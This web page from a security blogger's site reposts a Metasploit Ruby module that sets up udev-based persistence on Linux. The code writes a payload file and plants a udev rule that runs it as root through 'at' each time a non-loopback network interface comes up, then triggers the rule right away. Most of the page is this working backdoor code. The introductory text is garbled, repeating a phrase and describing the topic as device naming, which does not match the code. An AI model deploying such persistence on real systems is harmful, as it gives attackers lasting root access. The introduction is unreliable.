Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Udev Persistence Script

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 217
Udev Persistence Script
Udev Persistence Script
Udev persistence addresses the problem of inconsistent device naming in Udev persistence addresses the problem of inconsistent device naming in Linux. Without it, devices like `/dev/sdb` might swap names after a reboot or hotplug, breaking configurations and scripts.

Udev achieves persistence through *rules* (often in `/etc/udev/rules.d/`). These rules match unique, stable device attributes instead of volatile kernel-assigned names. Key attributes include `ID_FS_UUID` (for filesystems), `ID_SERIAL` (for storage devices), or `ID_PATH` (physical location).

When a rule matches, Udev creates a consistent symbolic link (e.g., `/dev/disk/by-uuid/...` or a custom `/dev/my_device`). This ensures your system reliably refers to the correct device every time, critical for stable mounts, scripts, and applications.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local

Rank = GreatRanking

include Msf::Post::File
include Msf::Post::Unix
include Msf::Exploit::Local::Persistence
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Deprecated
moved_from 'exploits/linux/local/udev_persistence'

def initialize(info = {})
super(
update_info(
info,
'Name' => 'udev Persistence',
'Description' => %q{
This module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk.
It'll be executed with root privileges everytime a network interface other than l0 comes up.
Execution is triggered through at command, so it must be installed on the target.
},
'License' => MSF_LICENSE,
'Author' => [
'Julien Voisin'
],
'Platform' => [ 'unix', 'linux' ],
'Arch' => [
ARCH_CMD,
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'Payload' => {
'BadChars' => '\n"'
},
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => '2003-11-01', # udev release date
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
},
'References' => [
['URL', 'https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp'],
['URL', 'https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/'],
['ATT&CK', Mitre::Attack::Technique::T1546_017_UDEV_RULES]
]
)
)
register_options([
OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),
OptString.new('UDEV_PATH', [false, 'Path to udev', '/lib/udev/rules.d/']),
OptString.new('UDEV_RULE', [false, 'Rule name for udev. Defaults to random']),
])
end

def check
print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
return CheckCode::Safe("#{datastore['UDEV_PATH']} doesnt exist") unless exists?(datastore['UDEV_PATH'])
return CheckCode::Safe("#{datastore['UDEV_PATH']} isnt writable") unless writable?(datastore['UDEV_PATH'])

return CheckCode::Safe('at commmand not found') if get_at_command('').nil?

CheckCode::Appears('likely exploitable')
end

def get_at_command(payload_path)
return nil unless executable? '/usr/bin/at'

%(/usr/bin/at -M -f #{payload_path} now)
end

def install_persistence
udev_rule = datastore['UDEV_RULE'].blank? ? %(#{Rex::Text.rand_text_numeric(2)}-#{Rex::Text.rand_text_alphanumeric(8)}.rules) : datastore['UDEV_RULE']
backdoor_path = "#{datastore['UDEV_PATH']}/#{udev_rule}"
payload_path = "#{writable_dir}/#{(datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alphanumeric(5..10))}"

if exists? backdoor_path
fail_with Failure::BadConfig, "#{backdoor_path} is already present"
end

if payload.arch.first == 'cmd'
upload_and_chmodx(payload_path, "#!/bin/sh\n#{payload.encoded}")
else
payload_path = writable_dir
payload_path = payload_path.end_with?('/') ? backdoor_path : "#{backdoor_path}/"
payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
payload_path << payload_name
print_status("Uploading payload file to #{payload_path}")
upload_and_chmodx payload_path, generate_payload_exe
end
@clean_up_rc << "rm #{payload_path}\n"

print_good "#{payload_path} written"

fail_with(Failure::PayloadFailed, 'Failed to write UDEV file') unless write_file(backdoor_path, %(SUBSYSTEM=="net", KERNEL!="lo", RUN+="#{get_at_command(payload_path)}"))
@clean_up_rc << "rm #{backdoor_path}\n"

print_good "#{backdoor_path} written"

# need to trigger first rule manually
print_status 'Triggering udev rule'
cmd_exec('udevadm trigger -v --subsystem-match=net')
end
end

Social Media Share